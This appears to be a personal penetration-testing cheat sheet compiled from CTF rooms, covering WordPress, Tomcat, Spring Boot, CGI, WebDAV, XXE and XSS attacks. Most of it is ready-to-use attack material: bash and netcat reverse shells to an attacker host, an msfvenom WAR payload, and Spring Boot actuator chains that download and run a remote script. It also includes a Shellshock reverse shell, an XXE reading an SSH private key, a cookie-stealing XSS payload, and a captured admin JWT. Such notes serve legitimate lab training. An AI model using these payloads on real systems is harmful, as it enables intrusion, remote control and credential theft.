Wordpress
Reverse Shell #1 - Edit existing Plugin
Examples
Kali
Copy git clone https://github.com/pentestmonkey/php-reverse-shell.git
cp php-reverse-shell/php-reverse-shell.php .
subl php-reverse-shell.php Update the page with your reverse shell then save. This will make the plugin not appear anymore under Installed Plugins
Curl the page to activate it.
Kali
Copy curl http://$VICTIM/wp-content/plugins/akismet/akismet.php Reverse Shell #2 - Upload Plugin
Examples
Mr Robot CTF Retro
revshell.php code
Copy <?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/$KALI/443 0>&1'");
?> Kali
Copy vi revshell.php
zip revshell.zip revshell.php
nc -lvnp 443 TomCat
Common usernames and passwords
Examples
Thompson
Reverse Shell
Examples
Thompson
Kali
Copy msfvenom -p java/jsp_shell_reverse_tcp LHOST=$KALI LPORT=1337 -f war > rshell.war
nc -lvnp 1337
Spring Boot
Reverse Shell
Examples
Exploit: https://spaceraccoon.dev/remote-code-execution-in-three-acts-chaining-exposed-actuators-and-h2-database/
Kali #1
Below example checks the IP which may not be necessary.
Kali #2
Copy curl -X 'POST' -H 'Content-Type: application/json' -H 'x-9ad42dea0356cb04: 172.16.0.21' --data-binary $'{\"name\":\"spring.datasource.hikari.connection-test-query\",\"value\":\"CREATE ALIAS EXEC AS CONCAT(\'String shellexec(String cmd) throws java.io.IOException { java.util.Scanner s = new\',\' java.util.Scanner(Runtime.getRun\',\'time().exec(cmd).getInputStream()); if (s.hasNext()) {return s.next();} throw new IllegalArgumentException(); }\');CALL EXEC(\'ping -c 5 $KALI\');\"}' "https://$VICTIM/actuator/env" -k
curl -X 'POST' -H 'Content-Type: application/json' -H 'x-9ad42dea0356cb04: 172.16.0.21' "https://$VICTIM/actuator/restart" -k reverse.sh
Copy bash -c "bash -i >& /dev/tcp/$KALI/1337 0>&1" Kali #1
Copy python3 -m http.server 81 Kali #2
Download payload
Kali #3
Copy curl -X 'POST' -H 'Content-Type: application/json' -H 'x-9ad42dea0356cb04: 172.16.0.21' --data-binary $'{\"name\":\"spring.datasource.hikari.connection-test-query\",\"value\":\"CREATE ALIAS EXEC AS CONCAT(\'String shellexec(String cmd) throws java.io.IOException { java.util.Scanner s = new\',\' java.util.Scanner(Runtime.getRun\',\'time().exec(cmd).getInputStream()); if (s.hasNext()) {return s.next();} throw new IllegalArgumentException(); }\');CALL EXEC(\'wget http://$KALI:81/reverse.sh -O /tmp/reverse.sh\');\"}' "https://$VICTIM/actuator/env" -k
curl -X 'POST' -H 'Content-Type: application/json' -H 'x-9ad42dea0356cb04: 172.16.0.21' "https://$VICTIM/actuator/restart" -k Run payload
Kali #3
Copy curl -X 'POST' -H 'Content-Type: application/json' -H 'x-9ad42dea0356cb04: 172.16.0.21' --data-binary $'{\"name\":\"spring.datasource.hikari.connection-test-query\",\"value\":\"CREATE ALIAS EXEC AS CONCAT(\'String shellexec(String cmd) throws java.io.IOException { java.util.Scanner s = new\',\' java.util.Scanner(Runtime.getRun\',\'time().exec(cmd).getInputStream()); if (s.hasNext()) {return s.next();} throw new IllegalArgumentException(); }\');CALL EXEC(\'bash /tmp/reverse.sh\');\"}' "https://$VICTIM/actuator/env" -k
curl -X 'POST' -H 'Content-Type: application/json' -H 'x-9ad42dea0356cb04: 172.16.0.21' "https://$VICTIM/actuator/restart" -k See CMDS from page source
Examples
Jack-of-All-Trades
Sometimes you can't see the results of the output from the page so you need to check the page source.
Copy view-source:http://$VICTIM:22/nnxhweOV/index.php?cmd=whoami Kali
Browser
Copy view-source:http://$VICTIM:22/nnxhweOV/index.php?cmd=nc%20-c%20sh%2010.10.154.80%201337
CGI-Bin
Scanning
Examples
0day
See if a cgi-bin folder appears in the inital scans, if it does start scanning that direcoty for .cgi files.
Kali
Copy gobuster dir -u http://$VICTIM/cgi-bin/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt,cgi Shell
Examples
0day
Link: https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/cgi
Kali#1
Kali #2
Copy curl -H 'Cookie: () { :;}; /bin/bash -i >& /dev/tcp/$KALI/4242 0>&1' http://$VICTIM/cgi-bin/test.cgi
Change request type
Examples
Mother's Secret
Change the request to POST and add everything else highlighted, we see the status message now changes.
Now we change the yaml to the the emergency override code mentioned in the room.
Now we perform the same steps again except this time for the api/nostromo route and the new file we discovered.
WebDav Cadvaer
If server is using WebDav and we have credentials we can login and upload files.
Examples
Dav
Kali
Copy cadaver http://$VICTIM:80/webdav
Username: wampp
Password: xampp
dav:/webdav/> put shell.php shell.php
XXE Injection
Exploiting XXE - In-Band
Examples
Exploiting XXE - Out-of-Band
Examples
SSRF + XXE
Examples
XML-RPC
Check if it is enabled
Examples
Retro
wpscan or a scan maybe able identified that xmlrpc.php exists, if it is check if it is enabled.
Copy POST /$SITE/xmlrpc.php HTTP/1.1
Host: $VICTIM
Content-Length: 91
<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall> View Files
Examples
Input
Copy <?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM 'file:///home/barry/.ssh/id_rsa'>]>
<comment>
<name>Joe Hamd</name>
<author>Barry Clad</author>
<com>&xxe;</com>
</comment> Base64 encode the file
Copy <!DOCTYPE replace [<!ENTITY test SYSTEM "php://filter/convert.base64-encode/resource=acc.php"> ]>
<search>&test;</search> XSS
Reflected XSS
Examples
Stored XSS
Examples
Dom-Based XSS
Examples
XSS - Steal JVT
Examples
XSS - Steal JVT
https://jwt.io/
I tried updating the token it didn't work
Next we're going to try to steal the JWT from another user.
Kali
Browser
Copy <script>document.location='http://$KALI:4444/XSS/grabber.php?c='+document.cookie</script> This was annoying because if I went to my posts it wouldn't work so I went to Jakes post and changed the number from 2 to 6 to get to the report page. Then just clicked the report button
we got a token from a user that isn't us
We can see it is from Michael who is an admin.
Sent again but this time just forwarded the request so we could see what that script was doing
The script was printing the flag
This wasn't working before but after next time I went to this box tried I could just update the cookie from the browser and it worked.
Brower cookie
Copy eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjIsInVzZXJuYW1lIjoibWljaGFlbCIsImFkbWluIjp0cnVlLCJpYXQiOjE3MDE1MjgzODN9.O8218jJ0nmWedeewklX6fkb9sjlgH81ciU7dJG5l9YY CSRF
Examples
CSRF
